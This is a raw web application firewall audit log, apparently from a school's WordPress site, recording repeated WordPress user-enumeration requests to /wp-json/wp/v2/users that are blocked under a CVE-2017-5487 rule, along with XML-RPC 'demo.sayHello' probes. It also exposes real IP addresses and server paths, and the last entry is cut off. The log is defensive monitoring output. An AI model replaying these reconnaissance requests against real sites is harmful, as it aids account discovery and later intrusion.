Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f8a0c0a-Z-- --3f7c341e-A-- [04/May/2025:17:17:29 +0700] aBc-udsVQyl9V2B8Pt_APQAAAEU 103.236.140.4 59500 103.236.140.4 8181 --3f7c341e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.138.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.138.212 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3f7c341e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f7c341e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746353849911918 3170 (- - -) Stopwatch2: 1746353849911918 3170; combined=1439, p1=472, p2=934, p3=0, p4=0, p5=33, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f7c341e-Z-- --a5f0fb38-A-- [04/May/2025:17:17:34 +0700] aBc-vuchPF6irSergtsBvAAAAMU 103.236.140.4 59504 103.236.140.4 8181 --a5f0fb38-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.138.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.138.212 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a5f0fb38-C-- demo.sayHello --a5f0fb38-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a5f0fb38-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746353854982801 5126 (- - -) Stopwatch2: 1746353854982801 5126; combined=3941, p1=522, p2=3216, p3=22, p4=24, p5=91, sr=113, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5f0fb38-Z-- --6f8a0c0a-A-- [04/May/2025:17:40:17 +0700] aBdEEWJEE9ao5dcyYWn3cgAAAJU 103.236.140.4 59640 103.236.140.4 8181 --6f8a0c0a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.96 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6f8a0c0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f8a0c0a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746355217210691 2375 (- - -) Stopwatch2: 1746355217210691 2375; combined=1280, p1=404, p2=845, p3=0, p4=0, p5=30, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f8a0c0a-Z-- --c8e61818-A-- [04/May/2025:17:40:22 +0700] aBdEFmJEE9ao5dcyYWn3cwAAAIo 103.236.140.4 59644 103.236.140.4 8181 --c8e61818-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.96 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.96 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c8e61818-C-- demo.sayHello --c8e61818-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8e61818-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746355222076687 4830 (- - -) Stopwatch2: 1746355222076687 4830; combined=3750, p1=430, p2=3108, p3=29, p4=32, p5=89, sr=66, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8e61818-Z-- --718f1e72-A-- [04/May/2025:17:42:00 +0700] aBdEeNsVQyl9V2B8Pt_AQQAAAEw 103.236.140.4 59658 103.236.140.4 8181 --718f1e72-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.169 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --718f1e72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --718f1e72-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746355320169491 3190 (- - -) Stopwatch2: 1746355320169491 3190; combined=1293, p1=438, p2=820, p3=0, p4=0, p5=35, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --718f1e72-Z-- --5ffcd544-A-- [04/May/2025:17:42:10 +0700] aBdEgmJEE9ao5dcyYWn3eAAAAI8 103.236.140.4 59662 103.236.140.4 8181 --5ffcd544-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.169 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5ffcd544-C-- demo.sayHello --5ffcd544-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ffcd544-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746355330685919 5957 (- - -) Stopwatch2: 1746355330685919 5957; combined=4304, p1=568, p2=3509, p3=33, p4=35, p5=95, sr=97, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ffcd544-Z-- --77b8200d-A-- [04/May/2025:17:43:51 +0700] aBdE52JEE9ao5dcyYWn3ewAAAJQ 103.236.140.4 59670 103.236.140.4 8181 --77b8200d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.38.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.38.250 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --77b8200d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77b8200d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746355431773549 3031 (- - -) Stopwatch2: 1746355431773549 3031; combined=1411, p1=447, p2=870, p3=0, p4=0, p5=94, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77b8200d-Z-- --e7845247-A-- [04/May/2025:17:44:01 +0700] aBdE8WJEE9ao5dcyYWn3fQAAAJI 103.236.140.4 59674 103.236.140.4 8181 --e7845247-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.38.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.38.250 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e7845247-C-- demo.sayHello --e7845247-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7845247-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746355441539806 5231 (- - -) Stopwatch2: 1746355441539806 5231; combined=3923, p1=511, p2=3197, p3=28, p4=32, p5=92, sr=69, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7845247-Z-- --0eb6603c-A-- [04/May/2025:17:45:54 +0700] aBdFYmJEE9ao5dcyYWn3gwAAAIY 103.236.140.4 59696 103.236.140.4 8181 --0eb6603c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.112 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0eb6603c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0eb6603c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746355554768179 3349 (- - -) Stopwatch2: 1746355554768179 3349; combined=1435, p1=470, p2=934, p3=0, p4=0, p5=31, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0eb6603c-Z-- --02f0e70e-A-- [04/May/2025:17:45:59 +0700] aBdFZ_nZiHJYHUAF8QfkNwAAAAk 103.236.140.4 59700 103.236.140.4 8181 --02f0e70e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.112 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --02f0e70e-C-- demo.sayHello --02f0e70e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --02f0e70e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746355559575796 5285 (- - -) Stopwatch2: 1746355559575796 5285; combined=3958, p1=533, p2=3211, p3=29, p4=31, p5=91, sr=73, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02f0e70e-Z-- --67bd6919-A-- [04/May/2025:17:47:34 +0700] aBdFxvnZiHJYHUAF8QfkVAAAABg 103.236.140.4 59796 103.236.140.4 8181 --67bd6919-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.235 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.235 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --67bd6919-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --67bd6919-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746355654034166 3211 (- - -) Stopwatch2: 1746355654034166 3211; combined=1410, p1=466, p2=911, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --67bd6919-Z-- --ab6c9944-A-- [04/May/2025:17:47:40 +0700] aBdFzPnZiHJYHUAF8QfkVwAAAAg 103.236.140.4 59808 103.236.140.4 8181 --ab6c9944-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.235 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.235 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ab6c9944-C-- demo.sayHello --ab6c9944-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab6c9944-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746355660101970 4907 (- - -) Stopwatch2: 1746355660101970 4907; combined=3841, p1=496, p2=3145, p3=23, p4=24, p5=90, sr=68, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab6c9944-Z-- --be209033-A-- [04/May/2025:18:08:56 +0700] aBdKyNsVQyl9V2B8Pt_AXQAAAFM 103.236.140.4 59950 103.236.140.4 8181 --be209033-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.60.209 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --be209033-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --be209033-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746356936278253 2997 (- - -) Stopwatch2: 1746356936278253 2997; combined=1335, p1=448, p2=856, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be209033-Z-- --79d8aa03-A-- [04/May/2025:18:09:02 +0700] aBdKztsVQyl9V2B8Pt_AXwAAAEQ 103.236.140.4 59954 103.236.140.4 8181 --79d8aa03-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.60.209 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.209 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --79d8aa03-C-- demo.sayHello --79d8aa03-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --79d8aa03-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746356942627987 6292 (- - -) Stopwatch2: 1746356942627987 6292; combined=4600, p1=604, p2=3758, p3=38, p4=43, p5=94, sr=74, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79d8aa03-Z-- --0fe9806e-A-- [04/May/2025:18:15:08 +0700] aBdMPNsVQyl9V2B8Pt_AZgAAAEk 103.236.140.4 59986 103.236.140.4 8181 --0fe9806e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.0.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.0.17 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0fe9806e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fe9806e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746357308190220 3380 (- - -) Stopwatch2: 1746357308190220 3380; combined=1426, p1=461, p2=934, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fe9806e-Z-- --b872395b-A-- [04/May/2025:18:15:14 +0700] aBdMQtsVQyl9V2B8Pt_AaAAAAEw 103.236.140.4 59994 103.236.140.4 8181 --b872395b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.0.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.0.17 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b872395b-C-- demo.sayHello --b872395b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b872395b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746357314431081 6077 (- - -) Stopwatch2: 1746357314431081 6077; combined=4317, p1=567, p2=3523, p3=30, p4=34, p5=96, sr=77, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b872395b-Z-- --325a1131-A-- [04/May/2025:18:15:53 +0700] aBdMadsVQyl9V2B8Pt_AagAAAE8 103.236.140.4 59998 103.236.140.4 8181 --325a1131-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.247 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.247 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --325a1131-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --325a1131-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 